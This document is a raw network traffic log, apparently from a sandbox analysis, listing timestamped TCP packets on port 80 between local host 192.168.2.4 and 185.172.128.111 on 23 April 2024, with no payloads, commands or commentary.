Apr 23, 2024 09:27:08.007791042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.007832050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.007869005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.007905006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.007961035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.007997036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008033037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008040905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008040905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008040905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008040905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008040905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008042097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008085012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008145094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008178949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008178949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008183002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008208036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008225918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008244991 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008281946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008316040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008317947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008338928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008358002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008361101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008394003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008405924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008430958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008438110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008471966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008485079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008521080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008533955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008558989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008584023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008594036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008603096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008630037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008646965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008667946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008687019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008702993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008719921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008739948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008754969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008778095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008816957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008830070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008831024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008852005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008861065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008888960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.008905888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.008944035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.018282890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.018321991 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.018460035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.018460035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.058792114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.058835030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.058872938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.058876991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.058877945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.058909893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.058939934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.058947086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.058962107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.058986902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059005022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059024096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059036016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059060097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059088945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059096098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059114933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059132099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059166908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059181929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059181929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059204102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059215069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059241056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059257984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059278011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059292078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059314966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059329987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059353113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059374094 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059390068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059401035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059426069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059463024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059467077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059488058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059499979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059516907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059535980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059561014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059572935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059592009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059607983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059631109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059643984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059654951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059679985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059684992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059715986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059751987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059763908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059763908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059787989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059793949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059823990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059859037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.059869051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059870005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.059902906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.060762882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.060822964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.060894966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.060930967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.060942888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.060966969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.060981035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061005116 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061026096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061041117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061048985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061078072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061084032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061114073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061120987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061151981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061172009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061192036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061193943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061229944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061244965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061266899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061275959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061304092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061321020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061341047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061376095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061410904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061413050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061448097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061453104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061453104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061494112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061518908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061554909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061569929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061590910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.061600924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.061645031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.109771013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.109817982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.109988928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.109989882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.110799074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.110836029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.110862970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.110874891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.110892057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.110912085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.110918999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.110948086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.110955000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.110984087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.110985041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111027002 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111038923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111073971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111084938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111110926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111118078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111146927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111151934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111190081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111196041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111226082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111237049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111262083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111269951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111299038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111304998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111335039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111344099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111371040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111378908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111407042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111407995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111442089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111449957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111478090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111485958 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111514091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.111519098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.111557007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113490105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113527060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113553047 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113563061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113574028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113600016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113601923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113636017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113642931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113672018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113673925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113708019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113715887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113744020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113755941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113780022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113786936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113816023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113826990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113852024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113862038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113888025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113907099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113933086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.113956928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.113991976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114017010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114027023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114032030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114063978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114079952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114099979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114111900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114137888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114147902 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114172935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114180088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114212036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114223957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114248037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114265919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114283085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114294052 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114319086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114329100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114356041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114362001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114392042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114406109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114432096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.114438057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.114474058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.158545017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.158608913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.158647060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.158684015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.158720970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.158757925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.158793926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.158795118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.158796072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.158833027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.158833027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.158833027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.158871889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.158910990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.159008026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.159008026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.159008026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.160039902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.160079002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.160180092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.160180092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.214708090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214752913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214775085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214793921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214812994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214833021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214838982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.214838982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.214854002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214874029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214894056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214910030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.214910030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.214910030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.214919090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214939117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214941025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.214941025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.214957952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214967966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.214981079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.214987993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215003014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215017080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215017080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215023994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215037107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215055943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215060949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215075016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215094090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215106010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215109110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215127945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215132952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215132952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215145111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215161085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215162992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215162992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215178967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215182066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215194941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215198994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215212107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215223074 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215228081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215249062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215249062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215254068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215267897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215270996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.215296984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.215306997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.224044085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.224072933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.224133015 CEST	49730	80	192.168.2.4	185.172.128.111
